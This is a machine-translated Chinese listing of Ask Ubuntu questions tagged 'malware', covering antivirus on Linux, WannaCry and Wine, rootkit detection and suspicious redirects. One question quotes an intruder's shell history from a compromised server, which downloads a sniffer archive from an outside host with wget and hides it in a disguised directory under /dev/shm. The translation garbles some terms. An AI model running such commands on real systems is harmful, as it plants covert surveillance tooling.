Questions tagged «malware»

与恶意软件有关的问题

24
我需要安装防病毒软件吗?[关闭]
我认为没有必要扫描无论是在Ubuntu或者任何Linux发行版,直到我发现的病毒扫描包的病毒clamtk,并klamav在Ubuntu软件中心昨天。 这导致以下问题: Linux和Windows之间的病毒有何区别? Linux和Windows之间的保护策略有何不同? 我的系统上应该安装病毒扫描程序包吗?如果是这样,哪个是更好的选择?
223 malware  antivirus 


1
在Ubuntu 18上显示“新病毒正在窃取数据!”的通知
最近,每当我打开Firefox时,都会在通知中心收到一条消息。它并不总是相同,并且还在不断变化。这是一个例子: 并非总是如此。它也提供其他消息,当我单击它时,它会将我发送到网络钓鱼站点。我不知道我是怎么得到的。 有人可以帮我摆脱它吗? 我尝试了Clam防病毒软件,但没有发现任何问题。

4
“ Wanna Cry”勒索软件对Linux用户可能有什么影响?
事实证明,您需要支付300美元的赎金,因为针对Microsoft Windows的勒索软件已加密您的数据。例如,Linux用户在使用Wine时需要采取什么措施来防止这种情况? 据报道,该勒索软件基于NSA开发的一种入侵计算机的工具。NSA工具由一个名为Shadow Brokers的黑客组织使用。可以在Github中找到该代码。 Microsoft 在2017年3月14日发布了针对此漏洞的补丁程序(MS17-010)。据报道,大规模感染已于4月14日开始传播。这在这里讨论。 由于六到八周内没有启动Windows 8.1,是否可以在不首先启动Windows的情况下从Ubuntu应用此修补程序?(经过研究后,ClamAV可能会从Linux端报告Windows分区的漏洞,但不太可能应用该补丁。最好的方法是重新启动Windows并应用补丁MS17-010。) 订阅Microsoft自动更新的个人和小型公司都没有感染。较大的组织会在针对组织内部网进行测试时延迟应用补丁,因此更有可能被感染。 2017年5月13日,Microsoft采取了非同寻常的步骤,发布了3年以来不受支持的Windows XP补丁。 如果Wine对安全更新没有做任何事情,那就没有消息了。在下面的评论中有报道说,当用户运行wine时,Linux也可能被感染。 一个“偶然的英雄”注册了一个域名,该域名充当了勒索软件的杀戮开关。我认为黑客在其私有Intranet上使用了不存在的域,因此他们不会感染自己。下次他们将变得更聪明,因此不要依赖此最新的kill-switch。最好的方法是安装Microsoft补丁程序,以防止利用SMBv1协议中的漏洞。 在2017年5月14日,Red Hat Linux表示它们不受“ Wanna Cry”勒索软件的影响。这可能会误导Ubuntu用户以及Red Hat,CentOS,ArchLinux和Fedora用户。红帽支持葡萄酒,下面的答案可以实现。本质上,Ubuntu和其他Linux发行版用户在使用谷歌搜索这个问题时可能会被此处的Red Hat Linux支持答案误导。 2017年5月15日更新。在过去的48小时内,Microsoft 为Windows 8,XP,Vista,Server 2008和Server 2003发布了名为KB4012598的补丁程序,以防御“ Wanna Cry”勒索软件。这些Windows版本不再自动更新。尽管昨天我在Windows 8.1平台上应用了安全更新MS17-010,但旧的Vista笔记本电脑仍需要下载并手动应用补丁KB4012598。 主持人注意:这个问题不是题外话-它询问是否有任何Linux用户需要采取任何步骤来防范这种风险。 在这里,它是完美的话题,因为它与Linux(Ubuntu是Linux)相关,并且也与运行Wine或类似兼容性层的Ubuntu用户甚至在他们的Ubuntu Linux计算机上的VM相关。
64 windows  wine  malware 

11
Windows病毒可以转移到Ubuntu吗?
在我从计算机上删除Windows 7并将其替换为Ubuntu之前,我遇到了257种以上无法消除的威胁。我不知道我所拥有的特洛伊木马是否也可以转移到Ubuntu。我的电脑可以感染吗?使用计算机时,我要非常小心,因为我不想购买新计算机。 我只有Windows 7和PC,只有几年了。首先,我把它带到了百思买,他们说计算机上应该装有特洛伊木马。这个人只是“看”了一下它,因为他把它放在了出厂设置中,所以它连续两次藏起来并偷走了我的电脑。然后,我把它带到一个我认识的人那里,他们重新建造了它。但是它又有很多问题。 我的防病毒软件,程序和其他文件在我眼前消失了。我的Wi-Fi已关闭,我无法将其重新打开。它甚至自行关闭。而且它从来没有这样做过。 我的Windows 7感染会转移到Ubuntu吗?请记住,我不再有Windows 7,只有Ubuntu。
50 malware 

3
clamav-错误:/var/log/clamav/freshclam.log被另一个进程锁定了吗?
我已经安装了clamav并且想要更新用于识别病毒的文件: $ sudo freshclam ERROR: /var/log/clamav/freshclam.log is locked by another process ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log). 我应该怎么处理这个错误? 编辑: $ sudo lsof /var/log/clamav/freshclam.log COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME freshclam 866 clamav 3wW REG 259,1 100134 10486045 /var/log/clamav/freshclam.log



2
在VServer上找到SSH后门。该怎么办?
昨天,我检查了VServer上的命令历史记录。我发现了几条可疑的线。 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget aridan.hol.es/sniffer.tgz 206 tar xvf ar 207 tar zxvf ar 208 …
24 ssh  security  malware 

8
在哪里可以找到可能已经安装在计算机上的恶意软件?
我想分析我的Ubuntu盒子,以检测它是否被黑客入侵了。我的问题是:在哪里可以找到是否启动了某些恶意软件?以下是某种原始列表: br 内核映像(我有md5) / sbin / init(我有md5) / etc / modules中的内核模块 /etc/init.d和/ etc / init中的所有服务脚本(我有md5) /etc/rc.local gnome自动运行 和? 我的问题是完全诚实的,不是恶意的。只是要检测我的盒子是否被盗。
23 boot  security  malware 

2
基于签名的rootkit扫描程序?
目前,我所知道的唯一的rootkit扫描程序必须在rootkit之前安装在计算机上,以便它们可以比较文件更改等(例如:chkrootkit和rkhunter),但是我真正需要做的是能够扫描我的计算机和其他计算机从LiveUSB中获取,因为如果rootkit足够好,那么它也将接管rootkit检测程序。 那么,是否存在适用于Ubuntu / Linux的基于签名的rootkit扫描程序,我可以将其安装在LiveUSB上并用于可靠地扫描插入的计算机,而不必监视行为或比较以前的文件?

6
防病毒软件可以保护我免受Linux恶意软件KillDisk的攻击吗?
我的一个亲戚最近给我发了一封电子邮件。他最近遇到了来自反病毒供应商ESET的令人震惊的标题: KillDisk现在针对Linux:要求25万美元的赎金,但无法解密 该电子邮件继续描述了一种软件,该软件对磁盘的内容进行加密并要求赎金。 我的亲戚很震惊,觉得现在肯定需要杀毒软件。 我强烈感到在Ubuntu上不需要防病毒软件。相反,我觉得对Ubuntu用户最好的保护是及时安装安全更新,保留常规备份以及仅安装来自受信任资源(如Ubuntu软件中心)的软件。现在,随着KillDisk的出现,该建议已经过时了吗?

7
重定向到“ http://domain-error.com”
我被重定向到网站“ http://domain-error.com ”。这是在Firefox,Chromium,Google chrome等中发生的。我感觉自己受到病毒或类似病毒的攻击。 更新:重定向经常发生,但并非总是如此,并且在所有浏览器中都在经历。 Firefox加载项管理器显示“ Ubuntu修改3.2(禁用)”。Firefox插件显示“ Cisco Systems,Inc.1.5.1提供的OpenH264视频编解码器”。/etc/hosts如下: 127.0.0.1 localhost 127.0.1.1 home-desktop # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 托管google.com结果如下 home@home-desktop:~$ host google.com google.com has address 216.58.220.14 google.com has IPv6 address 2404:6800:4009:804::200e ;; connection timed …


1
LibreOffice中鼠标指针下方的意外阿拉伯语消息-病毒?
真奇怪 今天,我使用LibreOffice打开了一个excel文件。突然,我看到鼠标改变了颜色,并停留在它上面的是阿拉伯语的消息,它每秒都在变化。我实际上可以阅读阿拉伯语,因此我立即将其识别为赞美真主(包括塔比尔)的伊斯兰信息。 这是屏幕截图: 起初我以为文件中有东西,但后来我发现任何LibreOffice程序(但只有LibreOffice程序)都会发生这种情况,即使打开它们,也只有在将鼠标悬停在LibreOffice程序上时才更改鼠标,并在其他任何地方恢复正常。另外,没有重新安装 我尝试运行软件更新程序-但是在无法加载某些Steam存储库的地方出现错误,但这似乎是一个巧合: Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en_US Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en 这是另一个提示-我尝试对几条消息进行了几个截屏,但最终都显示了相同的消息(上面的消息)。希望这意味着任何事情。 我应该注意,我最近没有安装任何工具,而且我几乎从未使用过LibreOffice(在需要处理文档时更喜欢使用Google云端硬盘),因此我真的不确定这是如何发生的。 无论如何,这很可怕。

By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.